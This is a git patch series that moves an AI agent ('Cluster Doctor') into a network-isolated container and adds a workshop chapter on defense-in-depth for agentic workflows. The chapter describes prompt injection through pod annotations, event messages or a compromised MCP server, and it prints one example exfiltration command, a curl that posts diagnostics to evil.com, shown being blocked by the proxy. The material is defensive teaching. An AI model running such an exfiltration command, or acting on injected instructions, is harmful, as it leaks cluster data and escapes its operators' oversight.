-docker run -d \ - --name "$PROXY_CONTAINER" \ - --network "$NETWORK_NAME" \ - -v "$REPO_ROOT/.github/containers/proxy/squid.conf:/etc/squid/squid.conf:ro" \ - -v "$DOMAINS_FILE:/etc/squid/allowed-domains.txt:ro" \ - ubuntu/squid:latest - -# Proxy needs bridge access to reach the internet on behalf of the agent -docker network connect bridge "$PROXY_CONTAINER" - -sleep 3 -echo "Proxy ready" - -# ── Run agent in isolated container ── -echo "Starting agent container (network-isolated, proxy-gated)..." -docker run --rm \ - --name "$AGENT_CONTAINER" \ - --network "$NETWORK_NAME" \ - -e "HTTP_PROXY=http://$PROXY_CONTAINER:3128" \ - -e "HTTPS_PROXY=http://$PROXY_CONTAINER:3128" \ - -e "NO_PROXY=localhost,127.0.0.1" \ - -e "GITHUB_TOKEN=$COPILOT_TOKEN" \ - -e "GITHUB_MCP_TOKEN=$GITHUB_MCP_TOKEN" \ - -e "KUBECONFIG=/home/agent/.kube/config" \ - -v "$KUBECONFIG_PATH:/home/agent/.kube/config:ro" \ - -v "$REPO_ROOT:/workspace:ro" \ - -v "$(dirname "$OUTPUT_FILE"):/output:rw" \ - -v "$PROMPT_FILE:/tmp/prompt.md:ro" \ - -w /workspace \ - cluster-doctor-agent:local \ - -c ' - kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & - sleep 3 - - copilot -p "$(cat /tmp/prompt.md)" \ - --agent "cluster-doctor" \ - --additional-mcp-config @"'"$MCP_CONFIG"'" \ - --allow-all-tools - - if [ -f agent-output.json ]; then - cp agent-output.json /output/'"$(basename "$OUTPUT_FILE")"' - fi - ' - -echo "Agent container exited" - -# Verify output -if [ -f "$OUTPUT_FILE" ]; then - echo "Agent output produced: $OUTPUT_FILE" - python3 -c "import json; json.load(open('$OUTPUT_FILE'))" || { - echo "ERROR: agent-output.json is not valid JSON" - exit 1 - } -else - echo "ERROR: Agent did not produce output" - exit 1 -fi - -# Full audit trail -echo "" -echo "=== Proxy access log (all agent network activity) ===" -docker logs "$PROXY_CONTAINER" 2>&1 | grep -v "cache.log" || true diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml 
b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index 48c24a2..588c23f 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,18 +1,19 @@ name: "Cluster Doctor (Safe Outputs)" -# Three-phase pattern with network-isolated agent: -# 1. Diagnose - Agent in container, all traffic through allowlisted proxy -# 2. Scan - Validate constraints, sanitize secrets, AI threat detection -# 3. Apply - Deterministic write to GitHub (issues, PRs) +# Full defense-in-depth pipeline using two composable actions: +# - agent-sandbox-action: container isolation + network firewall +# - safe-outputs-action: constraint validation + secret sanitization + gated writes # -# Defense-in-depth layers: -# - Container isolation (agent runs in Docker, not on bare runner) -# - Network firewall (Squid proxy with domain allowlist) -# - Scoped credentials (read-only K8s RBAC, read-only Azure) -# - Safe outputs (constraint validation, secret sanitization, threat detection) -# - Permission separation (three jobs, three permission sets) +# Three jobs, three permission sets, five security layers: +# 1. Container isolation (agent in Docker) +# 2. Network firewall (Squid proxy, domain allowlist) +# 3. Scoped credentials (read-only K8s + Azure) +# 4. Output validation (constraints, sanitization, threat detection) +# 5. Permission separation (diagnose / scan / apply) # -# See: https://github.com/microsoftgbb/safe-outputs-action +# See: +# https://github.com/microsoftgbb/agent-sandbox-action +# https://github.com/microsoftgbb/safe-outputs-action on: workflow_dispatch: @@ -24,14 +25,9 @@ on: permissions: contents: read -# ────────────────────────────────────────────────────────── -# Network firewall: domain allowlist for the agent container. -# The agent can ONLY reach these domains. Everything else is -# blocked by the Squid proxy at the network level. 
-# -# Edit this list to add/remove allowed destinations. -# The cluster API server FQDN is added dynamically at runtime. -# ────────────────────────────────────────────────────────── +# Domain allowlist for the agent sandbox. +# Edit this list to control which domains the agent can reach. +# The cluster API server FQDN is appended dynamically at runtime. env: AGENT_ALLOWED_DOMAINS: | api.githubcopilot.com @@ -44,21 +40,14 @@ jobs: # ────────────────────────────────────────────────────────── # Job 1: Diagnose # - # Setup runs on the bare runner (Azure login, kubeconfig). - # Agent runs inside an isolated Docker container where all - # network traffic is routed through a Squid proxy enforcing - # a domain allowlist. The proxy log provides a full audit - # trail of every domain the agent contacted. - # - # Allowed domains: - # - api.githubcopilot.com (model API) - # - api.github.com (GitHub MCP, read-only) - # - *.azmk8s.io (K8s API server, for port-forward) - # - login.microsoftonline.com (Azure AD token exchange) - # - management.azure.com (Azure ARM, read-only) - # - (injected dynamically) + # Agent runs inside a network-isolated Docker container. + # All traffic routes through a Squid proxy enforcing the + # domain allowlist above. Proxy access log provides a full + # audit trail. # - # Everything else is blocked at the network level. + # The agent can freely explore the cluster via read-only + # MCP access but cannot reach unauthorized domains or + # write to GitHub. 
# ────────────────────────────────────────────────────────── diagnose: if: | @@ -93,7 +82,6 @@ jobs: run: | curl -fsSL https://gh.io/copilot-install | bash - # ── Parse cluster info (runs on host, needs Copilot CLI) ── - name: Parse cluster info from issue body id: cluster-info env: @@ -121,7 +109,6 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT - # ── Setup cluster access (runs on host) ── - name: Azure CLI Login uses: azure/login@v2 with: @@ -129,7 +116,7 @@ jobs: tenant-id: ${{ secrets.ARM_TENANT_ID }} subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} - - name: Get AKS credentials and API server FQDN + - name: Get AKS credentials id: aks run: | az aks install-cli @@ -138,10 +125,8 @@ jobs: --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - # Extract the API server FQDN for the proxy allowlist API_SERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed 's|https://||' | cut -d: -f1) echo "api_server=$API_SERVER" >> $GITHUB_OUTPUT - echo "Cluster API server: $API_SERVER" - name: Post work started comment env: @@ -150,77 +135,60 @@ jobs: gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ --body "🤖 **Cluster Doctor is on the case!** - Connected to cluster. AI diagnosis starting in a sandboxed environment - with network-restricted access. + Connected to cluster. AI diagnosis starting in a network-isolated sandbox. 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" - # ── Generate agent prompt ── - - name: Generate diagnosis prompt - run: | - ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" - CLUSTER_NAME="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" - RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" - - cat > /tmp/diagnosis-prompt.md << PROMPT - You are the Cluster Doctor diagnosing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". 
- - Use the AKS MCP server to explore the cluster. You have read-only access to Kubernetes resources. - Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }} for context. - - INVESTIGATE FREELY: - - Start broad (cluster health, node status, pod states) - - Follow threads when you find issues (OOMKilled -> resource limits -> HPA -> node capacity) - - Check pod logs for crash details - - Trace dependency chains (service -> deployment -> pods -> events) - - Look at recent events for warning patterns - - Produce your findings as a JSON file at agent-output.json: - - { - "version": "1", - "actions": [ - { - "type": "issue_comment", - "issue_number": ${ISSUE_NUMBER}, - "body": "## Cluster Doctor Report\n\n" - } - ] - } - - For config/code fixes, add a create_pull_request action: - { - "type": "create_pull_request", - "title": "[cluster-doctor] ", - "body": "", - "head": "cluster-doctor/fix-", - "files": { "path/to/file": "content" } - } - - RULES: - - Write ONLY agent-output.json - - Do NOT include secrets, tokens, connection strings, or internal IPs - - Use [cluster-doctor] prefix on all titles - PROMPT - - # ── Run agent in sandboxed container ── - - name: Run sandboxed agent - env: - COPILOT_CLI_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} - GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: | - # Append the cluster-specific API server FQDN to the allowlist - DOMAINS="${AGENT_ALLOWED_DOMAINS} - ${{ steps.aks.outputs.api_server }}" - - .github/scripts/run-sandboxed-agent.sh \ - --kubeconfig "$HOME/.kube/config" \ - --allowed-domains "$DOMAINS" \ - --prompt-file /tmp/diagnosis-prompt.md \ - --output-file "$GITHUB_WORKSPACE/agent-output.json" \ - --mcp-config ".copilot/mcp-config.json" \ - --copilot-token "$COPILOT_CLI_TOKEN" \ - --github-mcp-token "$GITHUB_MCP_TOKEN" + # ── Sandboxed agent ── + - name: Run agent in sandbox + uses: microsoftgbb/agent-sandbox-action@v1 + with: + allowed-domains: | + ${{ env.AGENT_ALLOWED_DOMAINS }} + ${{ 
steps.aks.outputs.api_server }} + env-vars: | + GITHUB_TOKEN=${{ secrets.COPILOT_CLI_TOKEN }} + GITHUB_MCP_TOKEN=${{ secrets.GITHUB_TOKEN }} + KUBECONFIG=/home/agent/.kube/config + extra-mounts: | + /home/runner/.kube/config:/home/agent/.kube/config:ro + command: | + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 + + ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" + CLUSTER="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" + RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" + + copilot -p "You are the Cluster Doctor diagnosing AKS cluster '${CLUSTER}' in resource group '${RG}'. + + Use the AKS MCP server to explore the cluster (read-only). + Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }}. + + INVESTIGATE FREELY: + - Start broad (cluster health, node status, pod states) + - Follow threads (OOMKilled -> resource limits -> HPA -> node capacity) + - Check pod logs for crash details + - Trace dependency chains (service -> deployment -> pods -> events) + + Produce findings as agent-output.json: + { + \"version\": \"1\", + \"actions\": [ + { + \"type\": \"issue_comment\", + \"issue_number\": ${ISSUE_NUMBER}, + \"body\": \"## Cluster Doctor Report\n\n\" + } + ] + } + + For config fixes, add a create_pull_request action with files map. + Use [cluster-doctor] prefix on all titles. + Do NOT include secrets, tokens, or internal IPs." \ + --agent "cluster-doctor" \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools - uses: actions/upload-artifact@v4 with: @@ -232,8 +200,8 @@ jobs: # Job 2: Scan # # No credentials. No cluster access. No write tokens. - Pure validation: constraints, secret sanitization, AI threat scan. - Acts as a circuit breaker between diagnosis and action. + Validates constraints, sanitizes secrets, runs AI threat + detection. Circuit breaker between diagnosis and action.
# ────────────────────────────────────────────────────────── scan: needs: diagnose From a51eef924fe93cd1441d56a03964eac90eed4fa1 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 21:26:08 -0400 Subject: [PATCH 7/7] docs: add Act 4 - defense-in-depth for agentic workflows New workshop act covering security patterns for AI agents: - Container isolation + network firewall (agent-sandbox-action) - Constraint validation + secret sanitization (safe-outputs-action) - Three-job pipeline (diagnose / scan / apply) - Domain allowlist configuration - Comparison with gh-aw's security model - K8s RBAC recommendations - Workshop activity and discussion questions Also updated root README with workshop Acts table. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- Act-4/README.md | 426 ++++++++++++++++++++++++++++++++++++++++++++++++ README.md | 9 + 2 files changed, 435 insertions(+) create mode 100644 Act-4/README.md diff --git a/Act-4/README.md b/Act-4/README.md new file mode 100644 index 0000000..27aed8a --- /dev/null +++ b/Act-4/README.md @@ -0,0 +1,426 @@ +# Act 4: Agents Shouldn't Have the Keys to the Kingdom + +> **Workshop Goal:** Add defense-in-depth security to your agentic workflows using container isolation, network firewalls, and gated output pipelines - the same patterns GitHub Next uses in Agentic Workflows (gh-aw). + +--- + +## The Scene: The Agent That Knew Too Much + +Your Cluster Doctor agent from Act 3 is working great. It diagnoses failures, posts findings to issues, and opens PRs with fixes. The team loves it. 
+ +Then someone asks: **"What stops the agent from doing something we didn't ask for?"** + +Look at the original workflow: + +```yaml +permissions: + id-token: write + contents: write + issues: write + pull-requests: write +``` + +The agent has: +- **Write access to your repo** (it could push code to main) +- **Write access to issues and PRs** (it could spam your issue tracker) +- **Azure OIDC credentials** (it could talk to your cloud resources) +- **Full network access** (it could send data anywhere on the internet) +- **Direct runner access** (it could read environment variables, other secrets) + +You trust the agent's *intent* - but what about prompt injection? A malicious pod annotation, a crafted event message, or a compromised MCP server could manipulate the agent into doing things you never intended. + +**The question isn't "will the agent misbehave?" It's "what happens when it does?"** + +--- + +## The Insight: Separate Thinking from Acting + +[GitHub Next Agentic Workflows (gh-aw)](https://github.github.com/gh-aw/) solves this with a principle: **the agent can think freely, but its ability to act is constrained by architecture, not trust.** + +Their security model has five layers: + +| Layer | What it does | +|-------|-------------| +| Container isolation | Agent runs in a Docker container, not on the bare runner | +| Network firewall | Squid proxy enforces a domain allowlist - agent can only reach approved destinations | +| Scoped credentials | Agent gets a read-only token - it can observe but not modify | +| Safe outputs | Agent proposes actions as structured data; a separate job validates, sanitizes, and applies them | +| Permission separation | Agent job and write job have different permission sets | + +The problem: gh-aw is repo-scoped. It works great for code analysis, documentation, and issue triage. But it can't reach your Kubernetes cluster, your Azure resources, or your internal APIs. The sandbox blocks external access by design. 
+ +**The pattern we'll build:** Apply gh-aw's security principles to workflows that need external access, using two composable GitHub Actions. + +--- + +## Architecture: Three Jobs, Five Layers + +``` +Job 1: Diagnose Job 2: Scan Job 3: Apply +(read-only creds) (zero creds) (write token only) + ++---------------------------+ +| Docker (--internal net) | +| | +| +-------+ +---------+ | +| | Agent |->| Squid |--+--> allowed Constraint Download +| | | | proxy | | domains only validation scanned output +| +-------+ +---------+ | ++---------------------------+ Secret Apply via + | sanitization GitHub API + v artifact + AI threat + detection + + dry-run (no + writes here) +``` + +**Job 1 - Diagnose:** The agent runs inside a network-isolated container. It has read-only access to the cluster and can follow diagnostic threads freely. All HTTP/HTTPS traffic routes through a Squid proxy that enforces a domain allowlist defined in the workflow YAML. The agent produces a structured JSON artifact describing the actions it wants to take. + +**Job 2 - Scan:** No credentials of any kind. Downloads the agent's artifact and runs it through constraint validation (max issues, title prefixes, label allowlists), secret sanitization (regex patterns for tokens, connection strings, keys), and AI-powered threat detection (prompt injection, malicious code, social engineering). If anything fails, the workflow stops. Nothing gets written. + +**Job 3 - Apply:** Has a GitHub write token but no agent, no cluster credentials, and no AI reasoning. Mechanically applies the validated, sanitized output from Job 2. + +--- + +## The Two Actions + +This pattern is implemented as two composable GitHub Actions: + +### [agent-sandbox-action](https://github.com/microsoftgbb/agent-sandbox-action) - Input containment + +Wraps your agent in a network-isolated Docker container: + +```yaml +- uses: microsoftgbb/agent-sandbox-action@v1 + with: + command: | + copilot -p "Diagnose the cluster..." 
--agent cluster-doctor + allowed-domains: | + api.githubcopilot.com + api.github.com + .azmk8s.io + env-vars: | + GITHUB_TOKEN=${{ secrets.COPILOT_CLI_TOKEN }} +``` + +What it does: +- Creates a Docker network with `--internal` (no direct internet) +- Starts a Squid proxy on that network, connected to bridge for outbound +- Runs the agent container with `HTTP_PROXY`/`HTTPS_PROXY` pointed at the proxy +- Only domains in `allowed-domains` can be reached +- Proxy access log provides a full audit trail of every domain the agent contacted + +### [safe-outputs-action](https://github.com/microsoftgbb/safe-outputs-action) - Output gate + +Validates, sanitizes, and applies the agent's proposed actions: + +```yaml +- uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation" + threat-detection: true +``` + +What it does: +- **Constraint validation** - enforces limits on how many issues, comments, and PRs the agent can create; requires title prefixes; restricts labels +- **Secret sanitization** - scans all output fields for JWTs, Azure connection strings, AWS keys, GitHub PATs, private keys, and custom patterns +- **AI threat detection** - optional Copilot CLI scan for prompt injection, encoded credentials, malicious code, and social engineering +- **File-based PR creation** - agent provides a `files` map; the action creates branches and commits via the Git Data API + +--- + +## Agent Output Schema + +The agent produces a JSON file describing the actions it wants to take. The safe-outputs action validates and applies them: + +```json +{ + "version": "1", + "actions": [ + { + "type": "issue_comment", + "issue_number": 42, + "body": "## Cluster Doctor Report\n\nFindings here..." 
+ }, + { + "type": "create_pull_request", + "title": "[cluster-doctor] Fix HPA max replicas", + "body": "Analysis found HPA ceiling too low for current load.", + "head": "cluster-doctor/fix-hpa", + "files": { + "k8s/hpa.yaml": "apiVersion: autoscaling/v2\nkind: HorizontalPodAutoscaler\nmetadata:\n name: my-app\nspec:\n maxReplicas: 10" + } + } + ] +} +``` + +Supported action types: + +| Type | Description | +|------|-------------| +| `issue_comment` | Add a comment to an existing issue or PR | +| `create_issue` | Create a new issue | +| `create_pull_request` | Create a PR, optionally with inline file contents | +| `add_labels` | Add labels to an existing issue or PR | + +--- + +## Full Example: Secured Cluster Doctor + +Here is the cluster-doctor workflow from Act 3, refactored with all five security layers: + +```yaml +name: "Cluster Doctor (Safe Outputs)" + +on: + workflow_dispatch: + repository_dispatch: + types: [cluster-doctor-trigger] + issues: + types: [labeled, opened] + +permissions: + contents: read + +# Domain allowlist - the ONLY domains the agent can reach +env: + AGENT_ALLOWED_DOMAINS: | + api.githubcopilot.com + api.github.com + .azmk8s.io + login.microsoftonline.com + management.azure.com + +jobs: + # ── Job 1: Diagnose (read-only creds, sandboxed agent) ── + diagnose: + if: | + github.event_name == 'workflow_dispatch' || + github.event.label.name == 'cluster-doctor' + environment: copilot + runs-on: ubuntu-latest + permissions: + id-token: write # Azure OIDC (scoped to read-only role) + contents: read + issues: read + + steps: + - uses: actions/checkout@v5 + + # ... (parse cluster info, Azure login, get AKS credentials) ... 
+ + - name: Run agent in sandbox + uses: microsoftgbb/agent-sandbox-action@v1 + with: + allowed-domains: | + ${{ env.AGENT_ALLOWED_DOMAINS }} + ${{ steps.aks.outputs.api_server }} + env-vars: | + GITHUB_TOKEN=${{ secrets.COPILOT_CLI_TOKEN }} + GITHUB_MCP_TOKEN=${{ secrets.GITHUB_TOKEN }} + KUBECONFIG=/home/agent/.kube/config + extra-mounts: | + /home/runner/.kube/config:/home/agent/.kube/config:ro + command: | + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 + copilot -p "Diagnose the cluster..." \ + --agent cluster-doctor \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools + + - uses: actions/upload-artifact@v4 + with: + name: agent-output + path: agent-output.json + + # ── Job 2: Scan (zero creds, circuit breaker) ── + scan: + needs: diagnose + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/download-artifact@v4 + with: + name: agent-output + + - uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation" + threat-detection: true + dry-run: true + custom-secret-patterns: | + 10\.0\.\d+\.\d+ + aks-[a-z0-9]{8,} + + - uses: actions/upload-artifact@v4 + with: + name: scanned-output + path: agent-output.json + overwrite: true + + # ── Job 3: Apply (write token only, no agent) ── + apply: + needs: [diagnose, scan] + runs-on: ubuntu-latest + permissions: + issues: write + contents: write + pull-requests: write + steps: + - uses: actions/download-artifact@v4 + with: + name: scanned-output + + - uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation" +``` + +--- + +## What Changed from Act 3 + +| Dimension | Act 3 (original) | Act 4 (secured) |
+|-----------|------------------|-----------------| +| Agent environment | Bare runner, full access | Docker container, isolated network | +| Network access | Unrestricted internet | Squid proxy, domain allowlist | +| GitHub permissions | `contents: write`, `issues: write`, `pull-requests: write` in agent job | `contents: read`, `issues: read` in agent job; writes in separate job | +| How agent writes | Direct MCP calls to GitHub API | Produces JSON artifact, validated and applied by separate job | +| Secret exposure | Agent has all env vars including tokens | Agent has only scoped read-only credentials | +| Audit trail | GitHub Actions logs only | Proxy access log of every domain the agent contacted | +| Threat detection | None | AI-powered scan + regex sanitization | +| Output constraints | None - agent can create unlimited issues/PRs | Configurable limits, title prefixes, label allowlists | + +--- + +## The Domain Allowlist: Your Network Firewall + +The allowlist is defined in plain YAML at the top of the workflow: + +```yaml +env: + AGENT_ALLOWED_DOMAINS: | + api.githubcopilot.com + api.github.com + .azmk8s.io + login.microsoftonline.com + management.azure.com +``` + +The `.` prefix matches the domain and all of its subdomains (Squid `dstdomain` syntax). Keep comments out of the block scalar: YAML treats everything after `|` as literal content, so an inline `#` would become part of the allowlist entry itself. The cluster API server FQDN is appended dynamically at runtime.
+ +If the agent (or a prompt injection attack) tries to reach any other domain: + +``` +curl https://evil.com/exfil -d @diagnostics.json +# Blocked by the proxy (HTTP 403) - domain not in allowlist +``` + +The proxy access log records every request, providing a full audit trail: + +``` +1713139200.123 200 CONNECT api.githubcopilot.com:443 +1713139201.456 200 CONNECT api.github.com:443 +1713139202.789 403 CONNECT evil.com:443 # BLOCKED +``` + +--- + +## Recommended K8s RBAC + +The AKS MCP server should use a read-only ClusterRole: + +```yaml +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: cluster-doctor-readonly +rules: + - apiGroups: [""] + resources: [pods, events, nodes, services, namespaces] + verbs: [get, list] + - apiGroups: [""] + resources: [pods/log] + verbs: [get] + - apiGroups: [apps] + resources: [deployments, replicasets, daemonsets, statefulsets] + verbs: [get, list] + - apiGroups: [autoscaling] + resources: [horizontalpodautoscalers] + verbs: [get, list] + # NO secrets, NO configmaps, NO write verbs +```
+ +--- + +## How This Compares to gh-aw + +| Layer | gh-aw | This pattern | +|-------|-------|-------------| +| Container isolation | Built-in | `agent-sandbox-action` | +| Network firewall | AWF (Squid + iptables) | Squid + `--internal` Docker network | +| Domain config | Workflow markdown | Workflow YAML `env` block | +| Scoped credentials | Read-only GitHub token | Read-only K8s + Azure + GitHub | +| Safe outputs | Built-in (tightly coupled to runtime) | `safe-outputs-action` (standalone) | +| Threat detection | Built-in AI scan | Copilot CLI scan | +| Scope | Repo only (no external systems) | Any system the agent can reach | + +The key difference: gh-aw's sandbox works because it only needs to reach GitHub APIs. When your agent needs to talk to Kubernetes clusters, Azure resources, or other external systems, you need the same security patterns with a wider aperture for input sources. That is what these two actions provide. + +--- + +## Workshop Activity (30 minutes) + +### Part 1: Secure the Cluster Doctor (15 min) + +1. Look at the original cluster-doctor workflow from Act 3 +2. Identify which permissions the agent has that it doesn't need +3. Add `agent-sandbox-action` to the workflow with an appropriate domain allowlist +4. Add `safe-outputs-action` with constraints that match your team's policies + +### Part 2: Test the Guardrails (15 min) + +1. Run the secured workflow with `dry-run: true` on safe-outputs +2. Review the proxy access log - what domains did the agent contact? +3. Modify the agent prompt to ask for output that violates a constraint (e.g., missing title prefix) +4. Verify the scan job blocks it + +### Discussion Questions + +- What domains does your agent actually need? Start with zero and add as needed. +- What's the right max-comments / max-pull-requests for your team's workflows? +- Should `fail-on-sanitize` be true (strict) or false (redact and proceed)? +- How would you add a human approval step between scan and apply? 
+ +--- + +## Key Takeaways + +1. **Trust the architecture, not the agent.** A well-scoped agent with guardrails is safer than a "smart" agent with full access. The agent will eventually be confused or manipulated - what matters is the blast radius. + +2. **Separate thinking from acting.** The agent can reason freely with read-only access. Its proposed actions go through validation, sanitization, and threat detection before anything is written. + +3. **The domain allowlist is your network firewall.** Start with the minimum domains your agent needs. Every additional domain increases the exfiltration surface. + +4. **Output constraints catch what prompts can't prevent.** No matter how good your system prompt is, the agent might produce unexpected output. Hard limits on issues, required title prefixes, and label allowlists provide a deterministic safety net. + +5. **Audit trails matter.** The proxy access log and the safe-outputs summary give you visibility into exactly what the agent did and what it tried to do. 
diff --git a/README.md b/README.md index 5a4d7d9..1652f23 100644 --- a/README.md +++ b/README.md @@ -109,6 +109,15 @@ This repository is organized to support different presentation needs and learnin - **Presentations** - Slide decks tailored for different audiences (executives, practitioners, developers) - **Demos** - Hands-on examples demonstrating agentic platform engineering in action +### Workshop Acts (Crawl, Walk, Run) + +| Act | Title | Focus | +|-----|-------|-------| +| [Act 1](./Act-1/) | The Platform Is Growing Faster Than the Team | Knowledge capture with AI agent personas and prompts | +| [Act 2](./Act-2/) | Standards Exist, but They're Not Enforced | Embedding agents into CI/CD workflows | +| [Act 3](./Act-3/) | Kubernetes Operations Don't Scale Linearly | Event-driven agent workflows for incident response | +| [Act 4](./Act-4/) | Agents Shouldn't Have the Keys to the Kingdom | Defense-in-depth security for agentic workflows | + ## Getting Started _(Coming soon)_